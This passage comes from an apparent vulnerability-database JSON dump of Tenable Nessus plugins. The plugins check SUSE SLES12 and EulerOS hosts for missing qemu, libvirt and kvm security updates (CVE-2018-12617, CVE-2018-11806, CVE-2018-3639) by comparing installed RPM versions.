(rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-qemu-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-secret-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-secret-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-storage-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-storage-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-hooks-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-lxc-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-qemu-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-xen-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-debugsource-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-doc-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-lock-sanlock-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-lock-sanlock-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-nss-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-nss-debuginfo-2.0.0-27.42.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvirt\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-03T12:23:33", "bulletinFamily": "scanner", "description": "This update for qemu fixes the following security issues :\n\nCVE-2018-12617: qmp_guest_file_read had an integer overflow that could\nhave been exploited by sending a crafted QMP command (including\nguest-file-read with a large count value) to the agent via the\nlistening socket causing DoS (bsc#1098735)\n\nCVE-2018-11806: Prevent heap-based buffer overflow via incoming\nfragmented datagrams (bsc#1096223)\n\nWith this release the mitigations for Spectre v4 are moved the the\npatches from upstream (CVE-2018-3639, bsc#1092885).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2018-2973-2.NASL", "href": "https://www.tenable.com/plugins/nessus/118297", "published": "2018-10-22T00:00:00", "title": "SUSE SLES12 Security Update : qemu (SUSE-SU-2018:2973-2) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2973-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118297);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2018-11806\", \"CVE-2018-12617\", \"CVE-2018-3639\");\n\n script_name(english:\"SUSE SLES12 Security Update : qemu (SUSE-SU-2018:2973-2) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for qemu fixes the following security issues :\n\nCVE-2018-12617: qmp_guest_file_read had an integer overflow that could\nhave been exploited by sending a crafted QMP command (including\nguest-file-read with a large count value) to the agent via the\nlistening socket causing DoS (bsc#1098735)\n\nCVE-2018-11806: Prevent heap-based buffer overflow via incoming\nfragmented datagrams (bsc#1096223)\n\nWith this release the mitigations for Spectre v4 are moved the the\npatches from upstream (CVE-2018-3639, bsc#1092885).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1098735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11806/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12617/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3639/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182973-2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8d9e92b7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2018-2116=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-curl-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-curl-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-rbd-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-rbd-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-ssh-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-ssh-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-debugsource-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-guest-agent-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-guest-agent-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-kvm-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-lang-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-tools-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-tools-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-x86-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-x86-debuginfo-2.6.2-41.43.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:23:32", "bulletinFamily": "scanner", "description": "This update for qemu fixes the following security issues :\n\nCVE-2018-12617: qmp_guest_file_read had an integer overflow that could\nhave been exploited by sending a crafted QMP command (including\nguest-file-read with a large count value) to the agent via the\nlistening socket causing DoS (bsc#1098735)\n\nCVE-2018-11806: Prevent heap-based buffer overflow via incoming\nfragmented datagrams (bsc#1096223)\n\nWith this release the mitigations for Spectre v4 are moved the the\npatches from upstream (CVE-2018-3639, bsc#1092885).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2018-2973-1.NASL", "href": "https://www.tenable.com/plugins/nessus/117900", "published": "2018-10-03T00:00:00", "title": "SUSE SLES12 Security Update : qemu (SUSE-SU-2018:2973-1) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2973-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117900);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2018-11806\", \"CVE-2018-12617\", \"CVE-2018-3639\");\n\n script_name(english:\"SUSE SLES12 Security Update : qemu (SUSE-SU-2018:2973-1) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for qemu fixes the following security issues :\n\nCVE-2018-12617: qmp_guest_file_read had an integer overflow that could\nhave been exploited by sending a crafted QMP command (including\nguest-file-read with a large count value) to the agent via the\nlistening socket causing DoS (bsc#1098735)\n\nCVE-2018-11806: Prevent heap-based buffer overflow via incoming\nfragmented datagrams (bsc#1096223)\n\nWith this release the mitigations for Spectre v4 are moved the the\npatches from upstream (CVE-2018-3639, bsc#1092885).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1098735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11806/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12617/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3639/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182973-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ea77912\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2018-2116=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-2116=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-2116=1\n\nSUSE Enterprise Storage 4:zypper in -t patch\nSUSE-Storage-4-2018-2116=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/03\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-rbd-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-block-rbd-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-x86-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"qemu-x86-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"qemu-s390-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"qemu-s390-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-curl-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-curl-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-ssh-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-block-ssh-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-debugsource-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-guest-agent-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-guest-agent-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-lang-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-tools-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-tools-debuginfo-2.6.2-41.43.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"qemu-kvm-2.6.2-41.43.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:05:05", "bulletinFamily": "scanner", "description": "According to the version of the kvm package installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerability :\n\n - An industry-wide issue was found in the way many modern\n microprocessor designs have implemented speculative\n execution of Load & Store instructions (a commonly used\n performance optimization). It relies on the presence of\n a precisely-defined instruction sequence in the\n privileged code as well as the fact that memory read\n from address to which a recent memory write has\n occurred may see an older value and subsequently cause\n an update into the microprocessor", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2018-1271.NASL", "href": "https://www.tenable.com/plugins/nessus/117580", "published": "2018-09-18T00:00:00", "title": "EulerOS Virtualization 2.5.0 : kvm (EulerOS-SA-2018-1271)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117580);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/06/28 11:31:59\");\n\n script_cve_id(\n \"CVE-2018-3639\"\n );\n\n script_name(english:\"EulerOS Virtualization 2.5.0 : kvm (EulerOS-SA-2018-1271)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the kvm package installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerability :\n\n - An industry-wide issue was found in the way many modern\n microprocessor designs have implemented speculative\n execution of Load & Store instructions (a commonly used\n performance optimization). It relies on the presence of\n a precisely-defined instruction sequence in the\n privileged code as well as the fact that memory read\n from address to which a recent memory write has\n occurred may see an older value and subsequently cause\n an update into the microprocessor's data cache even for\n speculatively executed instructions that never actually\n commit (retire). As a result, an unprivileged attacker\n could use this flaw to read privileged memory by\n conducting targeted cache side-channel\n attacks.(CVE-2018-3639)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3b791a80\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kvm package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.5.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.5.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.5.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = 